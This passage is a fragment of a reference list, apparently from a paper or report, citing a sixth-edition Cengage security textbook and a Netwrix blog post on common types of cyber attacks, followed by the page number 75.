Security. 6th edition. Cengage Learning.
• https://blog.netwrix.com/2018/05/15/top-10-most-common-types-of-cyber-attacks/

75
